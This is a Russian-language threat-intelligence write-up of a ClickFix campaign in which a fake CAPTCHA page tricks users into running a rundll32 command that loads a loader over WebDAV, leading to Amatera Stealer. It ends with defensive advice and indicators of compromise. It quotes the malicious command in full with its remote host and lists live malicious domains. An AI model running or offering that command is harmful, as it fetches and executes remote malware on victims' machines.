Атака с использованием техники ClickFix: злоумышленники маскируют загрузку Amatera Stealer под интерактивную "человеческую проверку"

В основе схемы лежит тщательно сфабрикованная веб-страница, имитирующая интерфейс проверки CAPTCHA или аналогичный механизм "подтверждения, что вы не робот". Однако вместо стандартного взаимодействия с элементом страницы жертве предлагается скопировать и вручную выполнить в системной командной строке (например, через Win+R) специфическую команду. В данном случае она имела вид: "rundll32.exe \\r2-gate-entry.terralibre.in[.]net@80\verification.google,#1". Ключевой элемент здесь - использование UNC-пути (Uniform Naming Convention) с синтаксисом "@80", который указывает на использование протокола WebDAV для представления удалённого ресурса в виде сетевой папки. Это позволяет утилите "rundll32.exe", стандартному компоненту Windows для запуска библиотек, загрузить и выполнить код напрямую с удалённого сервера, минуя этап сохранения файла на диск. Такой подход обходит многие сигнатуры антивирусов, ориентированные на сканирование файлов, и не вызывает типичных предупреждений браузера о загрузке.

Исполняемый модуль "verification.google", маскирующийся под безобидное имя, представляет собой сложно-обфусцированный загрузчик. Для затруднения статического анализа авторы применили инструмент OLLVM, а также реализовали технику хеширования имён импортируемых функций. Вместо стандартной загрузки библиотек через API Windows, код динамически вычисляет хеш-суммы требуемых функций (по алгоритму, подобному DJB2) и ищет их в памяти, что скрывает его истинные намерения от автоматизированных средств анализа. Дальнейшее исполнение сопровождается набором анти-отладочных и противодействующих мониторингу приёмов. Среди них - регистрация векторизированного обработчика исключений, установка аппаратных точек останова на функции, связанные с трассировкой событий Windows (ETW), и использование так называемого "небесного врата" (Heaven's Gate) для переключения между режимами выполнения процессора с целью скрытого вызова системных функций.

Финальным этапом работы этого загрузчика является расшифровка и исполнение в памяти shellcode, который, в свою очередь, загружает основную полезную нагрузку - троянец-стилер Amatera Stealer. Этот модуль отвечает непосредственно за сбор конфиденциальной информации с заражённой системы. Его работа также построена с расчётом на скрытность: вместо жёстко прописанного адреса сервера управления, стилер сначала обращается к домену "fc.denmap.cfd", чтобы получить URL конфигурации, размещённый на легитимной платформе для публикаций Telegra.ph. Этот документ содержал закодированный в Base64 IP-адрес C2-сервера ("78.153.150[.]32"), на который впоследствии отправлялись похищенные данные. Использование популярных и доверенных сервисов для промежуточных этапов позволяет атакующим маскировать вредоносный трафик и быстро изменять инфраструктуру.

Данная кампания иллюстрирует чётко выстроенную цепочку компрометации: от социальной инженерии (фишинговый сайт с ложной проверкой) и обхода технических защит (удалённая загрузка через WebDAV) до сложного выполнения кода (обфускация, противодействие анализу) и скрытого сбора данных (динамическое получение конфигурации). Для специалистов по защите это сигнал о необходимости усиливать мониторинг не только конечных точек, но и сетевых аномалий. Ключевые рекомендации включают в себя обучение пользователей, которые должны насторожиться при любой просьбе скопировать и выполнить команды из браузера, ограничение возможностей запуска "rundll32.exe" для загрузки кода из UNC-путей с помощью политик AppLocker или WDAC, а также контроль доступа к внешним ресурсам, включая нестандартное использование платформ вроде Telegra.ph для служебных запросов. Борьба с такими многоступенчатыми угрозами требует комплексного подхода, сочетающего технические средства и повышение осведомлённости.

IPv4

• 78.153.150.32

Domains

• area2outer.boundarygateway.in.net
• ezjs.cl0udmere.in.net
• fc.denmap.cfd
• r2-gate-entry.terralibre.in.net
• svc2steel.exuviaestreamnet.in.net
• x9-space-v5.stratagrid.in.net

MD5

• baa1c1feed5c04e4b1e2f2ff88017fbb
• c2a0052c74e37562a8966fdd08aca0b7